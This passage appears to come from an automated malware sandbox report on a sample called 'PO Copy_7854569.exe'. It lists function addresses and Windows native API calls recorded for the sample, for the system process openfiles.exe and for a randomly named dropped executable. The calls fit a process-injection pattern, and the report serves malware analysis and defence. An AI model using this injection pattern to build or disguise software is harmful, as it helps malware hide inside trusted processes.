            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_01672DF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_01672C70
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016735C0 NtCreateMutant,LdrInitializeThunk,6_2_016735C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01674340 NtSetContextThread,6_2_01674340
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01674650 NtSuspendThread,6_2_01674650
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672BE0 NtQueryValueKey,6_2_01672BE0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672BF0 NtAllocateVirtualMemory,6_2_01672BF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672BA0 NtEnumerateValueKey,6_2_01672BA0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672B80 NtQueryInformationFile,6_2_01672B80
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672AF0 NtWriteFile,6_2_01672AF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672AD0 NtReadFile,6_2_01672AD0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672AB0 NtWaitForSingleObject,6_2_01672AB0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672D30 NtUnmapViewOfSection,6_2_01672D30
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672D00 NtSetInformationFile,6_2_01672D00
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672D10 NtMapViewOfSection,6_2_01672D10
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672DD0 NtDelayExecution,6_2_01672DD0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672DB0 NtEnumerateKey,6_2_01672DB0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672C60 NtCreateKey,6_2_01672C60
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672C00 NtQueryInformationProcess,6_2_01672C00
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672CF0 NtOpenProcess,6_2_01672CF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672CC0 NtQueryVirtualMemory,6_2_01672CC0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672CA0 NtQueryInformationToken,6_2_01672CA0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672F60 NtCreateProcessEx,6_2_01672F60
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672F30 NtCreateSection,6_2_01672F30
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672FE0 NtCreateFile,6_2_01672FE0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672FA0 NtQuerySection,6_2_01672FA0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672FB0 NtResumeThread,6_2_01672FB0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672F90 NtProtectVirtualMemory,6_2_01672F90
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672E30 NtWriteVirtualMemory,6_2_01672E30
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672EE0 NtQueueApcThread,6_2_01672EE0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672EA0 NtAdjustPrivilegesToken,6_2_01672EA0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672E80 NtReadVirtualMemory,6_2_01672E80
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01673010 NtOpenDirectoryObject,6_2_01673010
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01673090 NtSetValueKey,6_2_01673090
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016739B0 NtGetContextThread,6_2_016739B0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01673D70 NtOpenThread,6_2_01673D70
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01673D10 NtOpenProcessToken,6_2_01673D10
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C4650 NtSuspendThread,LdrInitializeThunk,8_2_048C4650
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C4340 NtSetContextThread,LdrInitializeThunk,8_2_048C4340
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_048C2CA0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2C60 NtCreateKey,LdrInitializeThunk,8_2_048C2C60
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_048C2C70
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2DD0 NtDelayExecution,LdrInitializeThunk,8_2_048C2DD0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_048C2DF0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_048C2D10
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_048C2D30
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_048C2E80
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_048C2EE0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2FB0 NtResumeThread,LdrInitializeThunk,8_2_048C2FB0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2FE0 NtCreateFile,LdrInitializeThunk,8_2_048C2FE0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2F30 NtCreateSection,LdrInitializeThunk,8_2_048C2F30
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2AD0 NtReadFile,LdrInitializeThunk,8_2_048C2AD0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2AF0 NtWriteFile,LdrInitializeThunk,8_2_048C2AF0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_048C2BA0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_048C2BE0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_048C2BF0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2B60 NtClose,LdrInitializeThunk,8_2_048C2B60
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C35C0 NtCreateMutant,LdrInitializeThunk,8_2_048C35C0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C39B0 NtGetContextThread,LdrInitializeThunk,8_2_048C39B0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2CC0 NtQueryVirtualMemory,8_2_048C2CC0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2CF0 NtOpenProcess,8_2_048C2CF0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2C00 NtQueryInformationProcess,8_2_048C2C00
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2DB0 NtEnumerateKey,8_2_048C2DB0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2D00 NtSetInformationFile,8_2_048C2D00
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2EA0 NtAdjustPrivilegesToken,8_2_048C2EA0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2E30 NtWriteVirtualMemory,8_2_048C2E30
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2F90 NtProtectVirtualMemory,8_2_048C2F90
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2FA0 NtQuerySection,8_2_048C2FA0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2F60 NtCreateProcessEx,8_2_048C2F60
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2AB0 NtWaitForSingleObject,8_2_048C2AB0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C2B80 NtQueryInformationFile,8_2_048C2B80
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C3090 NtSetValueKey,8_2_048C3090
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C3010 NtOpenDirectoryObject,8_2_048C3010
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C3D10 NtOpenProcessToken,8_2_048C3D10
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C3D70 NtOpenThread,8_2_048C3D70
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_02837720 NtCreateFile,8_2_02837720
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_02837A00 NtClose,8_2_02837A00
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_02837B50 NtAllocateVirtualMemory,8_2_02837B50
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_02837880 NtReadFile,8_2_02837880
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_02837960 NtDeleteFile,8_2_02837960
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 0_2_016BDFCC0_2_016BDFCC
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 0_2_076E33300_2_076E3330
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 0_2_076E86980_2_076E8698
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 0_2_076E62E00_2_076E62E0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 0_2_076E5EA80_2_076E5EA8
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 0_2_076E5E9A0_2_076E5E9A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 0_2_076E7DC00_2_076E7DC0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 0_2_076E7DBB0_2_076E7DBB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 0_2_076ED9700_2_076ED970
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 0_2_076E79880_2_076E7988
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_004010C06_2_004010C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0040F91C6_2_0040F91C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0040F9236_2_0040F923
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_004031A06_2_004031A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0042D2436_2_0042D243
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_004012106_2_00401210
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_004162A16_2_004162A1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_004162A36_2_004162A3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0040FB436_2_0040FB43
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0040DBC36_2_0040DBC3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_004025B06_2_004025B0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C81586_2_016C8158
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016301006_2_01630100
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DA1186_2_016DA118
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F81CC6_2_016F81CC
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F41A26_2_016F41A2
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_017001AA6_2_017001AA
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D20006_2_016D2000
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FA3526_2_016FA352
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164E3F06_2_0164E3F0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_017003E66_2_017003E6
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E02746_2_016E0274
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C02C06_2_016C02C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016405356_2_01640535
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_017005916_2_01700591
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F24466_2_016F2446
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E44206_2_016E4420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016EE4F66_2_016EE4F6
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016407706_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016647506_2_01664750
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163C7C06_2_0163C7C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165C6E06_2_0165C6E0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016569626_2_01656962
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A06_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0170A9A66_2_0170A9A6
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164A8406_2_0164A840
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016428406_2_01642840
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E8F06_2_0166E8F0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016268B86_2_016268B8
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FAB406_2_016FAB40
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F6BD76_2_016F6BD7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163EA806_2_0163EA80
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164AD006_2_0164AD00
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DCD1F6_2_016DCD1F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163ADE06_2_0163ADE0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01658DBF6_2_01658DBF
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640C006_2_01640C00
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01630CF26_2_01630CF2
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E0CB56_2_016E0CB5
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B4F406_2_016B4F40
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01682F286_2_01682F28
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01660F306_2_01660F30
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E2F306_2_016E2F30
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164CFE06_2_0164CFE0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01632FC86_2_01632FC8
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BEFA06_2_016BEFA0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640E596_2_01640E59
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FEE266_2_016FEE26
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FEEDB6_2_016FEEDB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01652E906_2_01652E90
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FCE936_2_016FCE93
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0167516C6_2_0167516C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162F1726_2_0162F172
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0170B16B6_2_0170B16B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164B1B06_2_0164B1B0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F70E96_2_016F70E9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FF0E06_2_016FF0E0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016EF0CC6_2_016EF0CC
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016470C06_2_016470C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162D34C6_2_0162D34C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F132D6_2_016F132D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0168739A6_2_0168739A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E12ED6_2_016E12ED
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165B2C06_2_0165B2C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016452A06_2_016452A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F75716_2_016F7571
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_017095C36_2_017095C3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DD5B06_2_016DD5B0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016314606_2_01631460
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FF43F6_2_016FF43F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FF7B06_2_016FF7B0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016856306_2_01685630
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F16CC6_2_016F16CC
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016499506_2_01649950
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165B9506_2_0165B950
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D59106_2_016D5910
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AD8006_2_016AD800
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016438E06_2_016438E0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FFB766_2_016FFB76
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B5BF06_2_016B5BF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0167DBF96_2_0167DBF9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165FB806_2_0165FB80
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B3A6C6_2_016B3A6C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FFA496_2_016FFA49
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F7A466_2_016F7A46
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016EDAC66_2_016EDAC6
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DDAAC6_2_016DDAAC
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01685AA06_2_01685AA0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E1AA36_2_016E1AA3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F7D736_2_016F7D73
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01643D406_2_01643D40
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F1D5A6_2_016F1D5A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165FDC06_2_0165FDC0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B9C326_2_016B9C32
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FFCF26_2_016FFCF2
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FFF096_2_016FFF09
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01603FD26_2_01603FD2
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01603FD56_2_01603FD5
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FFFB16_2_016FFFB1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01641F926_2_01641F92
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01649EB06_2_01649EB0
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_0389573A7_2_0389573A
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_038976BA7_2_038976BA
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_0389DE187_2_0389DE18
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_0389DE1A7_2_0389DE1A
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_038B4DBA7_2_038B4DBA
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_0389749A7_2_0389749A
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_038974937_2_03897493
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0493E4F68_2_0493E4F6
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049344208_2_04934420
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049424468_2_04942446
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049505918_2_04950591
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048905358_2_04890535
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048AC6E08_2_048AC6E0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0488C7C08_2_0488C7C0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048B47508_2_048B4750
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048907708_2_04890770
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049220008_2_04922000
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049441A28_2_049441A2
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049501AA8_2_049501AA
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049481CC8_2_049481CC
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048801008_2_04880100
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0492A1188_2_0492A118
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049181588_2_04918158
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049102C08_2_049102C0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049302748_2_04930274
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049503E68_2_049503E6
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0489E3F08_2_0489E3F0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494A3528_2_0494A352
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04930CB58_2_04930CB5
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04880CF28_2_04880CF2
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04890C008_2_04890C00
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048A8DBF8_2_048A8DBF
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0488ADE08_2_0488ADE0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0489AD008_2_0489AD00
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0492CD1F8_2_0492CD1F
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494CE938_2_0494CE93
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048A2E908_2_048A2E90
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494EEDB8_2_0494EEDB
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494EE268_2_0494EE26
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04890E598_2_04890E59
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0490EFA08_2_0490EFA0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04882FC88_2_04882FC8
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0489CFE08_2_0489CFE0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04932F308_2_04932F30
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048D2F288_2_048D2F28
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048B0F308_2_048B0F30
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04904F408_2_04904F40
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048768B88_2_048768B8
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048BE8F08_2_048BE8F0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0489A8408_2_0489A840
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048928408_2_04892840
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048929A08_2_048929A0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0495A9A68_2_0495A9A6
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048A69628_2_048A6962
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0488EA808_2_0488EA80
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04946BD78_2_04946BD7
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494AB408_2_0494AB40
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494F43F8_2_0494F43F
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048814608_2_04881460
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0492D5B08_2_0492D5B0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049595C38_2_049595C3
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049475718_2_04947571
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049416CC8_2_049416CC
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048D56308_2_048D5630
